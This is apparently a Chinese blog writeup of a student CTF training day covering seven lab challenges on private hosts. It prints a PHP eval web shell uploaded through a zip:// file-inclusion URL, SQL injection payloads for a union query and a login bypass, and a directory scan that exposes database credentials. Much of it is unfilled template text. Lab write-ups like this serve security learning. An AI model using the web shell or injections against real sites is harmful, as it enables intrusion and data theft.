实训课第五天 CTF 竞赛 Writeup

包罗万象

题目内容:

有一天,小吉发现在网上寻找好用的网盘,这时候他发现了这么一个网站。

题目分析:

对题目进行深入的分析,包括理解题目的要求、查找相关的资料、分析题目所涉及的技术或概念等。35e04a42e55843d0936af346f4064e87.png

 

解题过程:创建一个txt文件,写入<?php @eval($_POST['a']);?>,打包压缩成zip文件,上传得到其在服务器内的保存地址,然后粘贴到url=的后面写作http://192.168.210.79/index.php?url=zip:///var/www/html/upload/10569a05941f378d2dcf16da94101ec2.zip%23everything,然后enter,之后将链接粘贴进菜刀就可以跑出7e694dc052cd4bdd84220749a2e0fe26.png

 

结果展示:0a96ef086abf4eaa9f0064d1fe8b1c2f.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向

题目描述:

白云新闻搜索

题目分析:

 

中国又出现了一个搜索巨头!据报道,中国网络大亨小明近日编写了一个搜索引擎,叫白云新闻搜索,具体链接在下方,该搜索链接功能欠打,界面乏力,小明出一包辣条悬赏漏洞,豪言入侵高手都去试试,你服不服?不服就去试试呗~(答案为flag{}形式,提交{}中内容即可)

IP信息:192.168.210.71

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

首先关js,刷新后可以绕过字符验证,之后用sql语句慢慢试探,先查找sql默认文件,比如:

1、TABLE_SCHEMA:数据库实例名称;

2、TABLE_NAME:数据存放对象表名称;

3、TABLE_TYPE:数据存放对象类型(表或视图);

4、TABLE_ROWS:数据量;

5、COLUMN_NAME:字段名称

6、COLUMN_COMMENT:字段注释

7、COLUMN_TYPE:字段类型

' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA--'52863c10a1bc413a821a671708355cd3.png

 

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。

c306907534534eb0a1c036288005e989.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

题目描述:

admin123456

题目分析:

入门级入侵,你以为就这样你就能得分了?太小看admin 了。(答案为flag{}形式,提交{}中内容即可)IP信息:192.168.210.74

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

先关jsp,然后两个’or 1 or’,enter就完了

1d7f92da8efa46e7910f5f26caeba2ad.png

 

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。

7ad0f23ce0ae4e90820bb06e8ce2f1d1.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

题目描述:

我的生日

题目分析:

没耳朵的的猫,大家都喜欢,因为小口袋有好多东西。但是你知道他的生日么?(答案为flag{}形式,提交{}中内容即可)

IP信息:192.168.210.76

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

去网上搜哆啦A梦的生日,输入生日和验证码就完了

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。

8d9b4b2686794c4e9c6a5fbd0e806027.jpeg

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

题目描述: 

似乎有秘密

题目分析:

这个word文件的内容看起来似乎有啥秘密,解开看看吧

http://192.168.210.21/adl-oss/resources/ab19328c13074a1c80a87ec39bbdd389?token=400cc9e0-4adb-4ee9-97f3-eff540e20274&fileName&fileType=download

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

该换颜色,然后base64解密就完了a510f6acea3f432da85900825fabb00b.png

 

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。3ee14240a2a949ccaf0d97d4e090aea5.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

题目描述: 

管理员的愤怒

题目分析:

 

阿水是某部门的网站管理员,一天他发现自己管理的网站被挂上了暗链,链接指向了一个IP。阿水非常愤怒,表示一定要给点对方颜色看看,但是这小子没学过渗透。下面给各位这个IP,看大家如何进入坏蛋的网站获得flag为阿水报仇。

IP信息:192.168.210.78

 

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

复制IP御剑扫描,扫出四个网址

b522654a7f5048198f7575a887eddea9.png

 

打开看看有什么

0983a90d936c4e0eadbd736c395c3677.png

 

在db.phps文件中有数据库密码,下载打开,查看

03632ba4fc4a4256ab1c46ed241e2b82.png

 

在打开网页http://192.168.210.78/dbadmin登录,找到flag

70a80e70aac94896831a28f59317a4d0.png

 

 

 

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。4b1ad2ab82a7484bb3210998c3638a06.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

题目描述: 

隐藏的钥匙

题目分析:

路飞一行人千辛万苦来到了伟大航道的终点,找到了传说中的One piece,但是需要钥匙才能打开One Piece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙,打开One

解题过程:

详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。

将图片用hxd打开,查找字符flag,

 

将字符用base64解析

af20e67104a342cea1195a90f0f06911.png

 

结果展示:

展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。2c061ba80b4d49efa806942a87767255.png

 

总结与反思:

对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。

  • 23
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值